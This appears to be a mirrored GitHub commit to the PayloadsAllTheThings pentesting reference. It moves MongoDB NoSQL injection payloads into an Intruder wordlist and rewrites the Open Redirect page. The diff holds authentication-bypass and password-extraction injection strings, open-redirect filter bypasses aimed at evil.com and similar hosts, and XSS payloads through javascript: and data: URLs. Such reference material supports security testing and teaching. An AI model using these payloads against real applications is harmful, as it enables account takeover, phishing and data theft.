mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 06:12:47 +00:00
NoSQL + Open Redirect
This commit is contained in:
parent
6795bee1c4
commit
29f46934ac
5 changed files with 140 additions and 164 deletions
|
@ -33,6 +33,7 @@ If the web application is not checking which parameters are allowed to be update
|
|||
|
||||
* [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
|
||||
* [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
|
||||
* [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment)
|
||||
|
||||
|
||||
## References
|
||||
|
|
20
NoSQL Injection/Intruder/MongoDB.txt
Normal file
20
NoSQL Injection/Intruder/MongoDB.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
|
@ -8,13 +8,12 @@
|
|||
* [Tools](#tools)
|
||||
* [Methodology](#methodology)
|
||||
* [Authentication Bypass](#authentication-bypass)
|
||||
* [Extract length information](#extract-length-information)
|
||||
* [Extract data information](#extract-data-information)
|
||||
* [Extract Length Information](#extract-length-information)
|
||||
* [Extract Data Information](#extract-data-information)
|
||||
* [Blind NoSQL](#blind-nosql)
|
||||
* [POST with JSON body](#post-with-json-body)
|
||||
* [POST with urlencoded body](#post-with-urlencoded-body)
|
||||
* [POST with JSON Body](#post-with-json-body)
|
||||
* [POST with urlencoded Body](#post-with-urlencoded-body)
|
||||
* [GET](#get)
|
||||
* [MongoDB Payloads](#mongodb-payloads)
|
||||
* [Labs](#references)
|
||||
* [References](#references)
|
||||
|
||||
|
@ -30,7 +29,7 @@
|
|||
|
||||
### Authentication Bypass
|
||||
|
||||
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||
Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
|
||||
|
||||
* in HTTP data
|
||||
```ps1
|
||||
|
@ -49,14 +48,16 @@ Basic authentication bypass using not equal ($ne) or greater ($gt)
|
|||
```
|
||||
|
||||
|
||||
### Extract length information
|
||||
### Extract Length Information
|
||||
|
||||
Inject a payload using the $regex operator. The injection will work when the length is correct.
|
||||
|
||||
```ps1
|
||||
username[$ne]=toto&password[$regex]=.{1}
|
||||
username[$ne]=toto&password[$regex]=.{3}
|
||||
```
|
||||
|
||||
### Extract data information
|
||||
### Extract Data Information
|
||||
|
||||
Extract data with "`$regex`" query operator.
|
||||
|
||||
|
@ -86,7 +87,7 @@ Extract data with "`$in`" query operator.
|
|||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST with JSON body
|
||||
### POST with JSON Body
|
||||
|
||||
Python script:
|
||||
|
||||
|
@ -112,7 +113,7 @@ while True:
|
|||
password += c
|
||||
```
|
||||
|
||||
### POST with urlencoded body
|
||||
### POST with urlencoded Body
|
||||
|
||||
Python script:
|
||||
|
||||
|
@ -140,7 +141,7 @@ while True:
|
|||
|
||||
### GET
|
||||
|
||||
python script:
|
||||
Python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
@ -191,32 +192,6 @@ end
|
|||
```
|
||||
|
||||
|
||||
## MongoDB Payloads
|
||||
|
||||
```bash
|
||||
true, $where: '1 == 1'
|
||||
, $where: '1 == 1'
|
||||
$where: '1 == 1'
|
||||
', $where: '1 == 1'
|
||||
1, $where: '1 == 1'
|
||||
{ $ne: 1 }
|
||||
', $or: [ {}, { 'a':'a
|
||||
' } ], $comment:'successful MongoDB injection'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
||||
```
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [Root Me - NoSQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Authentication)
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
|
||||
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
|
||||
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
|
||||
- [OAuth private key disclosure](#oauth-private-key-disclosure)
|
||||
- [OAuth Private Key Disclosure](#oauth-private-key-disclosure)
|
||||
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
|
||||
- [Cross-Site Request Forgery](#cross-site-request-forgery)
|
||||
- [Labs](#labs)
|
||||
|
@ -52,7 +52,7 @@ https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca
|
|||
```
|
||||
|
||||
|
||||
## OAuth private key disclosure
|
||||
## OAuth Private Key Disclosure
|
||||
|
||||
Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Open URL Redirection
|
||||
# Open URL Redirect
|
||||
|
||||
> Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
|
||||
|
||||
|
@ -7,9 +7,11 @@
|
|||
|
||||
* [Methodology](#methodology)
|
||||
* [HTTP Redirection Status Code](#http-redirection-status-code)
|
||||
* [Fuzzing](#fuzzing)
|
||||
* [Redirect Methods](#redirect-methods)
|
||||
* [Path-based Redirects](#path-based-redirects)
|
||||
* [JavaScript-based Redirects](#javascript-based-redirects)
|
||||
* [Common Query Parameters](#common-query-parameters)
|
||||
* [Filter Bypass](#filter-bypass)
|
||||
* [Common injection parameters](#common-injection-parameters)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
@ -20,8 +22,7 @@ An open redirect vulnerability occurs when a web application or server uses unva
|
|||
|
||||
Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.
|
||||
|
||||
Consider this example:
|
||||
Your web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
|
||||
**Example**: A web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
|
||||
|
||||
```ps1
|
||||
https://example.com/redirect?url=https://userpreferredsite.com
|
||||
|
@ -44,146 +45,125 @@ HTTP Redirection status codes, those starting with 3, indicate that the client m
|
|||
- [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
|
||||
|
||||
|
||||
## Fuzzing
|
||||
## Redirect Methods
|
||||
|
||||
Replace `www.whitelisteddomain.tld` from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
|
||||
### Path-based Redirects
|
||||
|
||||
To do this simply modify the `WHITELISTEDDOMAIN` with value `www.test.com `to your test case URL.
|
||||
Instead of query parameters, redirection logic may rely on the path:
|
||||
|
||||
* Using slashes in URLs: `https://example.com/redirect/http://malicious.com`
|
||||
* Injecting relative paths: `https://example.com/redirect/../http://malicious.com`
|
||||
|
||||
|
||||
### JavaScript-based Redirects
|
||||
|
||||
If the application uses JavaScript for redirects, attackers may manipulate script variables:
|
||||
|
||||
**Example**:
|
||||
|
||||
```js
|
||||
var redirectTo = "http://trusted.com";
|
||||
window.location = redirectTo;
|
||||
```
|
||||
|
||||
**Payload**: `?redirectTo=http://malicious.com`
|
||||
|
||||
|
||||
### Common Parameters
|
||||
|
||||
```powershell
|
||||
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
|
||||
?checkout_url={payload}
|
||||
?continue={payload}
|
||||
?dest={payload}
|
||||
?destination={payload}
|
||||
?go={payload}
|
||||
?image_url={payload}
|
||||
?next={payload}
|
||||
?redir={payload}
|
||||
?redirect_uri={payload}
|
||||
?redirect_url={payload}
|
||||
?redirect={payload}
|
||||
?return_path={payload}
|
||||
?return_to={payload}
|
||||
?return={payload}
|
||||
?returnTo={payload}
|
||||
?rurl={payload}
|
||||
?target={payload}
|
||||
?url={payload}
|
||||
?view={payload}
|
||||
/{payload}
|
||||
/redirect/{payload}
|
||||
```
|
||||
|
||||
|
||||
## Filter Bypass
|
||||
|
||||
Using a whitelisted domain or keyword
|
||||
* Using a whitelisted domain or keyword
|
||||
```powershell
|
||||
www.whitelisted.com.evil.com redirect to evil.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
www.whitelisted.com.evil.com redirect to evil.com
|
||||
```
|
||||
* Using **CRLF** to bypass "javascript" blacklisted keyword
|
||||
```powershell
|
||||
java%0d%0ascript%0d%0a:alert(0)
|
||||
```
|
||||
|
||||
Using CRLF to bypass "javascript" blacklisted keyword
|
||||
* Using "`//`" and "`////`" to bypass "http" blacklisted keyword
|
||||
```powershell
|
||||
//google.com
|
||||
////google.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
java%0d%0ascript%0d%0a:alert(0)
|
||||
```
|
||||
* Using "https:" to bypass "`//`" blacklisted keyword
|
||||
```powershell
|
||||
https:google.com
|
||||
```
|
||||
|
||||
Using "//" & "////" to bypass "http" blacklisted keyword
|
||||
* Using "`\/\/`" to bypass "`//`" blacklisted keyword
|
||||
```powershell
|
||||
\/\/google.com/
|
||||
/\/google.com/
|
||||
```
|
||||
|
||||
```powershell
|
||||
//google.com
|
||||
////google.com
|
||||
```
|
||||
* Using "`%E3%80%82`" to bypass "." blacklisted character
|
||||
```powershell
|
||||
/?redir=google。com
|
||||
//google%E3%80%82com
|
||||
```
|
||||
|
||||
Using "https:" to bypass "//" blacklisted keyword
|
||||
* Using null byte "`%00`" to bypass blacklist filter
|
||||
```powershell
|
||||
//google%00.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
https:google.com
|
||||
```
|
||||
* Using HTTP Parameter Pollution
|
||||
```powershell
|
||||
?next=whitelisted.com&next=google.com
|
||||
```
|
||||
|
||||
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
|
||||
* Using "@" character. [Common Internet Scheme Syntax](https://datatracker.ietf.org/doc/html/rfc1738)
|
||||
```powershell
|
||||
//<user>:<password>@<host>:<port>/<url-path>
|
||||
http://www.theirsite.com@yoursite.com/
|
||||
```
|
||||
|
||||
```powershell
|
||||
\/\/google.com/
|
||||
/\/google.com/
|
||||
```
|
||||
* Creating folder as their domain
|
||||
```powershell
|
||||
http://www.yoursite.com/http://www.theirsite.com/
|
||||
http://www.yoursite.com/folder/www.folder.com
|
||||
```
|
||||
|
||||
Using "%E3%80%82" to bypass "." blacklisted character
|
||||
* Using "`?`" character, browser will translate it to "`/?`"
|
||||
```powershell
|
||||
http://www.yoursite.com?http://www.theirsite.com/
|
||||
http://www.yoursite.com?folder/www.folder.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
/?redir=google。com
|
||||
//google%E3%80%82com
|
||||
```
|
||||
|
||||
Using null byte "%00" to bypass blacklist filter
|
||||
|
||||
```powershell
|
||||
//google%00.com
|
||||
```
|
||||
|
||||
Using parameter pollution
|
||||
|
||||
```powershell
|
||||
?next=whitelisted.com&next=google.com
|
||||
```
|
||||
|
||||
Using "@" character, browser will redirect to anything after the "@"
|
||||
|
||||
```powershell
|
||||
http://www.theirsite.com@yoursite.com/
|
||||
```
|
||||
|
||||
Creating folder as their domain
|
||||
|
||||
```powershell
|
||||
http://www.yoursite.com/http://www.theirsite.com/
|
||||
http://www.yoursite.com/folder/www.folder.com
|
||||
```
|
||||
|
||||
Using "`?`" character, browser will translate it to "`/?`"
|
||||
|
||||
```powershell
|
||||
http://www.yoursite.com?http://www.theirsite.com/
|
||||
http://www.yoursite.com?folder/www.folder.com
|
||||
```
|
||||
|
||||
|
||||
Host/Split Unicode Normalization
|
||||
|
||||
```powershell
|
||||
https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
|
||||
http://a.com/X.b.com
|
||||
```
|
||||
|
||||
XSS from Open URL - If it's in a JS variable
|
||||
|
||||
```powershell
|
||||
";alert(0);//
|
||||
```
|
||||
|
||||
XSS from data:// wrapper
|
||||
|
||||
```powershell
|
||||
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
|
||||
```
|
||||
|
||||
XSS from javascript:// wrapper
|
||||
|
||||
```powershell
|
||||
http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
```
|
||||
|
||||
|
||||
## Common injection parameters
|
||||
|
||||
```powershell
|
||||
/{payload}
|
||||
?next={payload}
|
||||
?url={payload}
|
||||
?target={payload}
|
||||
?rurl={payload}
|
||||
?dest={payload}
|
||||
?destination={payload}
|
||||
?redir={payload}
|
||||
?redirect_uri={payload}
|
||||
?redirect_url={payload}
|
||||
?redirect={payload}
|
||||
/redirect/{payload}
|
||||
/cgi-bin/redirect.cgi?{payload}
|
||||
/out/{payload}
|
||||
/out?{payload}
|
||||
?view={payload}
|
||||
/login?to={payload}
|
||||
?image_url={payload}
|
||||
?go={payload}
|
||||
?return={payload}
|
||||
?returnTo={payload}
|
||||
?return_to={payload}
|
||||
?checkout_url={payload}
|
||||
?continue={payload}
|
||||
?return_path={payload}
|
||||
```
|
||||
* Host/Split Unicode Normalization
|
||||
```powershell
|
||||
https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
|
||||
http://a.com/X.b.com
|
||||
```
|
||||
|
||||
|
||||
## Labs
|
||||
|
|
Loading…
Reference in a new issue